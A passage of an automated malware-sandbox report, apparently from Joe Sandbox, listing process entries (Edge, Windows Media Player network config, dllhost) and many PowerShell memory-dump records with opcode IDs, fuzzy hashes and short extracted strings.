                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2860 --field-trial-handle=2864,i,15536600320984337439,5913391626331834,262144 /prefetch:3
                                                                                                              Imagebase:0x7ff715da0000
                                                                                                              File size:4'210'216 bytes
                                                                                                              MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Target ID:32
                                                                                                              Start time:04:40:04
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Program Files\Windows Media Player\wmpnscfg.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Program Files\Windows Media Player\wmpnscfg.exe"
                                                                                                              Imagebase:0x7ff7bba50000
                                                                                                              File size:71'168 bytes
                                                                                                              MD5 hash:F912FF78DE347834EA56CEB0E12F80EC
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              Target ID:33
                                                                                                              Start time:04:40:09
                                                                                                              Start date:05/12/2024
                                                                                                              Path:C:\Windows\System32\dllhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:"C:\Windows\system32\dllhost.exe"
                                                                                                              Imagebase:0x7ff642ec0000
                                                                                                              File size:21'312 bytes
                                                                                                              MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:false

                                                                                                              Reset < >
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.3674597398.00007FFD33FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_7ffd33fe0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                • Instruction ID: cec0f48a34755161ecfa82e7c73c01dff86587cbd02f01a326caf2d6443d378a
                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                • Instruction Fuzzy Hash: 4201A73020CB0C4FD744EF0CE051AA5B3E0FB85320F10052EE58AC3651DA32E882CB42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2429283600.00007FFD33FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_7ffd33fe0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a06bdde7bd9eeb31c3f8a53135ee0348ad358261c0dd856cc6249f4f9575f319
                                                                                                                • Instruction ID: 99e6454e6cbaa674add07fd3d0dea83c032cf70b697b9074154eeadf2bb97681
                                                                                                                • Opcode Fuzzy Hash: a06bdde7bd9eeb31c3f8a53135ee0348ad358261c0dd856cc6249f4f9575f319
                                                                                                                • Instruction Fuzzy Hash: D3F19130A08A4D8FEFA8DF28C8557E977D1FF54311F44436AE84ED7291DB38A9458B81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2429283600.00007FFD33FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_7ffd33fe0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bd503f077ceaf765ef0d52bf3c032d61075b1903ac3c28e4ff2ea0a501bb6840
                                                                                                                • Instruction ID: 63b73a1564b91bccf95f9b18e64e1f4df37637cdcc005c4acbc5bd3f9dd9973d
                                                                                                                • Opcode Fuzzy Hash: bd503f077ceaf765ef0d52bf3c032d61075b1903ac3c28e4ff2ea0a501bb6840
                                                                                                                • Instruction Fuzzy Hash: 1BE1B230A0DA4E8FEBA8DF28C8667E977D1FB54310F44436ED84DD7295DE78A8408B81
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2429283600.00007FFD33FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_7ffd33fe0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: !4
                                                                                                                • API String ID: 0-961947202
                                                                                                                • Opcode ID: a79dbd332fe67e6a27519c2934a17d56c268852dcee38f0cbe0e8610bb154c49
                                                                                                                • Instruction ID: 0887e699c6481a649750a99ed6570463b507cf65eba7110e50b2871dbc36f864
                                                                                                                • Opcode Fuzzy Hash: a79dbd332fe67e6a27519c2934a17d56c268852dcee38f0cbe0e8610bb154c49
                                                                                                                • Instruction Fuzzy Hash: E8328330A18A4D8FDF98DF5CC4A5AA977E1FF98300F54426AE40DE7696CA35F841CB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2429283600.00007FFD33FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_7ffd33fe0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7b73236f56e14714c64bb98fec691b94315bb22231d2389fff0ad11c6c53aaa1
                                                                                                                • Instruction ID: d00e0ce1ba22f3f021107dc349efe56890a742ba8b4700fb43e207c8140ff4b5
                                                                                                                • Opcode Fuzzy Hash: 7b73236f56e14714c64bb98fec691b94315bb22231d2389fff0ad11c6c53aaa1
                                                                                                                • Instruction Fuzzy Hash: F4B1B33060DA8D4FEB69EF28D8557E93BE1FF55310F44426EE84DC7292CA74A845CB82
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2429283600.00007FFD33FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_7ffd33fe0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9be5a7ff66732e0d5861acf6f62c228626a247ef4cb0bd48e7cd8e1a2f2137db
                                                                                                                • Instruction ID: 5933680eb2333d324aa1bcb94c855c1e995028fc7dfb046a59b7fc603fe90a45
                                                                                                                • Opcode Fuzzy Hash: 9be5a7ff66732e0d5861acf6f62c228626a247ef4cb0bd48e7cd8e1a2f2137db
                                                                                                                • Instruction Fuzzy Hash: 2A313930A1E24ECEFBB4AF14CD2ABF93391FB41316F840238D61D960A2CA783945CB11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2429801922.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_7ffd340b0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dee19bb226b651349a3cf179d686d1dca68deb3c220ab520526d95bddc48f264
                                                                                                                • Instruction ID: f356fa840dc3277dfa8c75c8ba070f0fbaa2754f11edb754e5541c3d3933ede7
                                                                                                                • Opcode Fuzzy Hash: dee19bb226b651349a3cf179d686d1dca68deb3c220ab520526d95bddc48f264
                                                                                                                • Instruction Fuzzy Hash: B4212622F0DF8A0FE3A5AB2C14A527462C2EF96310B4901BAE11CC3197ED6DEC01660A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2429801922.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_7ffd340b0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b7b9f70a4e5d3a66aee20cb3feb193ff0b1629d75eaa0aabe27fb8a66b02fe12
                                                                                                                • Instruction ID: 03831a1f196a122c867237a7af1d9bacf75a3746cca96c1c5b73b7740dbaf780
                                                                                                                • Opcode Fuzzy Hash: b7b9f70a4e5d3a66aee20cb3feb193ff0b1629d75eaa0aabe27fb8a66b02fe12
                                                                                                                • Instruction Fuzzy Hash: 47014922F1EA990FF7E5A7EC18651B8B2C1EF567A4B4901F7E41CE3193ED4CAC006685
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2429283600.00007FFD33FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_7ffd33fe0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                • Instruction ID: a015334dfd6333bdbc0247659e3c59bc658e9758d1bcecb1df073737c3f51788
                                                                                                                • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                • Instruction Fuzzy Hash: F501A73020CB0C4FD744EF0CE051AA9B3E0FB85320F10052EE58AC3691D732E881CB41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2429801922.00007FFD340B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD340B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_7ffd340b0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2c609f88233b84f1f84b8e5339b6e694eac8f68709d926d367467e936a12e5f1
                                                                                                                • Instruction ID: 7df7b5d935f0e2162ce6b41cc7adf8725e9c58ced3f76d5b882ff8852d758763
                                                                                                                • Opcode Fuzzy Hash: 2c609f88233b84f1f84b8e5339b6e694eac8f68709d926d367467e936a12e5f1
                                                                                                                • Instruction Fuzzy Hash: 01E02223F0EA864FEB94773C482816C27D0FF9629070401BBE00DCB093CC589C084310
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.2429283600.00007FFD33FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD33FE0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_7ffd33fe0000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 376248a43741e395c1fcca5e26db2279bdf46d4f2deda781bf5f76ff764761ac
                                                                                                                • Instruction ID: fc2b8e3dbf282f72a3c260bdfbcf4ac5308ce3a7fa0be40ea654c1493d338727
                                                                                                                • Opcode Fuzzy Hash: 376248a43741e395c1fcca5e26db2279bdf46d4f2deda781bf5f76ff764761ac
                                                                                                                • Instruction Fuzzy Hash: D781B757F0EFD21BF362866C59760D53FD0EF5323174E02BBCA889B093A9191887A391
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2677120352.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_4d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: \V@n
                                                                                                                • API String ID: 0-2463972958
                                                                                                                • Opcode ID: 248dc54cc5ae29eddeb5002763620733bb90106a6ce49cba6989faa76528fe64
                                                                                                                • Instruction ID: 8533d72e489b4fbcb4ec9a561dc40243ab5004530eb7a9c1f838014af5caa81d
                                                                                                                • Opcode Fuzzy Hash: 248dc54cc5ae29eddeb5002763620733bb90106a6ce49cba6989faa76528fe64
                                                                                                                • Instruction Fuzzy Hash: B0B12A70E002199FEF10CFA9C88579DBBF2BF89714F148529E815E7294EB74A845CB81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2677120352.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_4d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fe3196f559a1265174324f3e84db96a3c2ea0b593e49227d0a515ae60f1eff3a
                                                                                                                • Instruction ID: b3412bdb270bfc03749e25ff210fc9f3d14e08a2283f4f70c7a2175c3e91b184
                                                                                                                • Opcode Fuzzy Hash: fe3196f559a1265174324f3e84db96a3c2ea0b593e49227d0a515ae60f1eff3a
                                                                                                                • Instruction Fuzzy Hash: 06B12C70E002099FDF14CFA9D89579DBBF2BF88714F14852DD819EB254EB74A885CB81
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (fRl$(fRl$(fRl$(fRl$84Pl$84Pl$84Pl$84Pl$84Pl$84Pl$84Pl$84Pl$84Pl$84Pl$84Pl$84Pl$84Pl$84Pl$x.Ck$-Ck
                                                                                                                • API String ID: 0-770644822
                                                                                                                • Opcode ID: 37688dc15a2ed74619deeac6baa42a1ffd238604d3a26165c7bdfa42e726b02b
                                                                                                                • Instruction ID: e47dc46a8334fb92b7f23a2da301aa43f6f11a865147893c3a1b3bf334866f70
                                                                                                                • Opcode Fuzzy Hash: 37688dc15a2ed74619deeac6baa42a1ffd238604d3a26165c7bdfa42e726b02b
                                                                                                                • Instruction Fuzzy Hash: 49F2E9F1B00205DFEB64AF65C454B6ABBE2EFC9710F1480AAE9059B395CB71DC41CBA1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (fRl$(fRl$(fRl$(fRl$(fRl$(fRl$(fRl$(fRl$x.Ck$-Ck
                                                                                                                • API String ID: 0-1486284439
                                                                                                                • Opcode ID: 1708492b3e0db7b42be3855d466f4a5b92d1c7fa7988c41da20918ae389052f2
                                                                                                                • Instruction ID: e81edc991963a3495701160d58a45374be0fe0baa36492864dfcb014a25bad19
                                                                                                                • Opcode Fuzzy Hash: 1708492b3e0db7b42be3855d466f4a5b92d1c7fa7988c41da20918ae389052f2
                                                                                                                • Instruction Fuzzy Hash: D09296B0A00215DFEB64DBA8C850B6ABBF2EFC5318F1481A9D5059B786CF75DC41CB92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (fRl$(fRl$(fRl$(fRl$(fRl$(fRl
                                                                                                                • API String ID: 0-2511016155
                                                                                                                • Opcode ID: 31a666ac361460b7fd8dc2105453f6b1ba83e8ccad2687178a0fb52a8adda3db
                                                                                                                • Instruction ID: efc84cb7c4577c92c3b1323d3668ab7f4b49a6009600fff3ae6d7376b09b92ad
                                                                                                                • Opcode Fuzzy Hash: 31a666ac361460b7fd8dc2105453f6b1ba83e8ccad2687178a0fb52a8adda3db
                                                                                                                • Instruction Fuzzy Hash: 0A6235B4A00246CFEB54DF98C444A9ABBF2EFC9704F24C0A9D9159F355CB76E846CB42
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2677120352.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_4d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 8N@n$h]@n$h]@n$h]@n$I@n
                                                                                                                • API String ID: 0-1610025474
                                                                                                                • Opcode ID: 45ce27c865433608ee36efbb7d8e0f5b51acf1e0dfc76bbda4bab6e9ba3986c4
                                                                                                                • Instruction ID: 09ccddffa9db44e3c410a1aaff9fc24baee1ed8539de854e7f45f407699d57d5
                                                                                                                • Opcode Fuzzy Hash: 45ce27c865433608ee36efbb7d8e0f5b51acf1e0dfc76bbda4bab6e9ba3986c4
                                                                                                                • Instruction Fuzzy Hash: 78225C30B001188FDB25EB75D854AAEBBF6BF89304F1584AAD409AB351CF35AD81CF91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (fRl$(fRl$(fRl$(fRl$(fRl
                                                                                                                • API String ID: 0-1167094415
                                                                                                                • Opcode ID: 296b32ea95cef14bdb60ba6b7fe005c15b186fc3ea76b929dc207a844b1288df
                                                                                                                • Instruction ID: d0793166f4edc9467f54439b9c9834054f7048231d1ba1c2f65182f366f58ca9
                                                                                                                • Opcode Fuzzy Hash: 296b32ea95cef14bdb60ba6b7fe005c15b186fc3ea76b929dc207a844b1288df
                                                                                                                • Instruction Fuzzy Hash: 7C0272F0A00215DFEB60DF98C850E6ABBB2EF85718F248599D8159B755CB32EC42CF91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (fRl$(fRl$x.Ck$x.Ck$-Ck
                                                                                                                • API String ID: 0-989430743
                                                                                                                • Opcode ID: dbbcbef4365b9a81fee50df924e56fc871c2764abb16604a64dc3b90b376965b
                                                                                                                • Instruction ID: d25c40c354ab10b9ce67a3f9109f584c732be7bb07c7576ddebd9a90840f6ef3
                                                                                                                • Opcode Fuzzy Hash: dbbcbef4365b9a81fee50df924e56fc871c2764abb16604a64dc3b90b376965b
                                                                                                                • Instruction Fuzzy Hash: EDF181B0A00215DFE764EB68C851F6ABBA2EFC4704F108499E5096F786CB76DD418B92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (fRl$(fRl$(fRl$(fRl$x.Ck
                                                                                                                • API String ID: 0-1034491878
                                                                                                                • Opcode ID: 77bdb916c6fa121bbad19fae558b92ed6d7287dad0ff7ca06b012e245b792666
                                                                                                                • Instruction ID: 16457aa209c78165b3a95a7a2eb63c4e4ae1ad5667b078d4bb32631a69a0fb6c
                                                                                                                • Opcode Fuzzy Hash: 77bdb916c6fa121bbad19fae558b92ed6d7287dad0ff7ca06b012e245b792666
                                                                                                                • Instruction Fuzzy Hash: CCB16FB0A00205DFE764DBA8C945B9AB7E2AFC8704F1080A9D5056F795CB76EC41CF52
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (fRl$(fRl$(fRl
                                                                                                                • API String ID: 0-2020437110
                                                                                                                • Opcode ID: 2e12d22aea4872fe1cd2df8d112984abd1a327133c3787807c722ca019ddad77
                                                                                                                • Instruction ID: e037ea6cd4c8185dee48da1249dd2890c507af77f95ab330f1a2b40ca90b444c
                                                                                                                • Opcode Fuzzy Hash: 2e12d22aea4872fe1cd2df8d112984abd1a327133c3787807c722ca019ddad77
                                                                                                                • Instruction Fuzzy Hash: 995256B4A00242CFEB54DF98C584E99BBF2EF89704F15C0A9E815AF355CB76E846CB41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (fRl$(fRl$x.Ck
                                                                                                                • API String ID: 0-5507359
                                                                                                                • Opcode ID: be39634a546986568f1e862f7fac1c17658c4b0e4f02442263d510f29896d54b
                                                                                                                • Instruction ID: 69b40b94e8db239dddf87a37df3b84f539b6a026aaacde200a8dcad3fc93bb2a
                                                                                                                • Opcode Fuzzy Hash: be39634a546986568f1e862f7fac1c17658c4b0e4f02442263d510f29896d54b
                                                                                                                • Instruction Fuzzy Hash: 55A15BF0A00205DFEB64DB64C945F9AB7E2EFC8714F1480A9E9046B791CB76E851CF62
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (fRl$(fRl
                                                                                                                • API String ID: 0-3553362356
                                                                                                                • Opcode ID: 0796714104a760d8ec0c8643c44d68f98130e339b6ce4ab60a7480e3a4f013a0
                                                                                                                • Instruction ID: 8b2db113089e131325929d31742a5ecf0a860525359fc7fa88f540a98f45cf7a
                                                                                                                • Opcode Fuzzy Hash: 0796714104a760d8ec0c8643c44d68f98130e339b6ce4ab60a7480e3a4f013a0
                                                                                                                • Instruction Fuzzy Hash: 232259B4A00242DFEB54DF98C584E99BBB2EF89704F14C0A9E915AF355CB76EC42CB41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: h2Ek$h2Ek
                                                                                                                • API String ID: 0-134783507
                                                                                                                • Opcode ID: 01d44c83e7baab5bb1feefdafc1ffd32df3b3cf6054e4f6b998336e3986e6b57
                                                                                                                • Instruction ID: eec05d68820b847c78ead5bef77e6b40cbc90fbd31495db59000c589ec9cd526
                                                                                                                • Opcode Fuzzy Hash: 01d44c83e7baab5bb1feefdafc1ffd32df3b3cf6054e4f6b998336e3986e6b57
                                                                                                                • Instruction Fuzzy Hash: 9C028AB4B01209EFE754DB58C444FA9BBB2EF89704F14C0A9E915AB781CB72EC42CB51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: x.Ck$-Ck
                                                                                                                • API String ID: 0-2225241833
                                                                                                                • Opcode ID: 8de6bf3d8559ca7e512baa8de39af3e7474bebc2aa556e380b4da1d02c0ff3ed
                                                                                                                • Instruction ID: 2ca607dcdf853289f65bc4e192a0bec9bbf192e44ec98d496aa55e3afe6ec9cf
                                                                                                                • Opcode Fuzzy Hash: 8de6bf3d8559ca7e512baa8de39af3e7474bebc2aa556e380b4da1d02c0ff3ed
                                                                                                                • Instruction Fuzzy Hash: 18D1ADB0A00209DFE754EBA8C454B6EBBA2EFC4308F20C469E5056F795CF76D841CB92
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 84Pl$84Pl
                                                                                                                • API String ID: 0-4068960660
                                                                                                                • Opcode ID: 7c934b7528458a2768c40098bdd15c164f7985db046a8c374ec2216398e04110
                                                                                                                • Instruction ID: 703bc01a95780fce9f1a55b0d0ce7984f4cfbfa02b7cefb318a9484b47618c95
                                                                                                                • Opcode Fuzzy Hash: 7c934b7528458a2768c40098bdd15c164f7985db046a8c374ec2216398e04110
                                                                                                                • Instruction Fuzzy Hash: 25B128B1A04345DFE765AB68C814BA6BFA1FF82611F1980EBD444CF296CB35DC41C7A2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: x.Ck$-Ck
                                                                                                                • API String ID: 0-2225241833
                                                                                                                • Opcode ID: 03c204e953da1c8c3af09a31b2da44726b654f719941d9eb132263902b419d12
                                                                                                                • Instruction ID: 4c8c115b4ad95359a581ca5ea236d7deb9eca8cf2662c912a6b83cc419ed9838
                                                                                                                • Opcode Fuzzy Hash: 03c204e953da1c8c3af09a31b2da44726b654f719941d9eb132263902b419d12
                                                                                                                • Instruction Fuzzy Hash: C5B1A0B0A00205DFEB54DB94C454BAEBBB2EFC8318F24C499D9146F395CB76E841CB52
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2677120352.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_4d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: \V@n$\V@n
                                                                                                                • API String ID: 0-269168472
                                                                                                                • Opcode ID: 42d82be5d23487890d8e1d8537c8b1e13b3c3ebcbca8e25bfe7c3f5123282754
                                                                                                                • Instruction ID: c969df7bf89bd32db4df4889c60c8c6f862092caded02638ebf2e933141d92ca
                                                                                                                • Opcode Fuzzy Hash: 42d82be5d23487890d8e1d8537c8b1e13b3c3ebcbca8e25bfe7c3f5123282754
                                                                                                                • Instruction Fuzzy Hash: 05712770E002599FDF20CFA9D88479EBBF2FF88714F148529E414EB290EB74A845CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2677120352.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_4d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: \V@n$\V@n
                                                                                                                • API String ID: 0-269168472
                                                                                                                • Opcode ID: 431795227a35030c2fa0a8a6cffa3f57daedff8c10e4109ec14f0558c9c12678
                                                                                                                • Instruction ID: 2e2d4a49c50789b30ce47f772f8a5550ef6cf626843843a055430c970558e8e3
                                                                                                                • Opcode Fuzzy Hash: 431795227a35030c2fa0a8a6cffa3f57daedff8c10e4109ec14f0558c9c12678
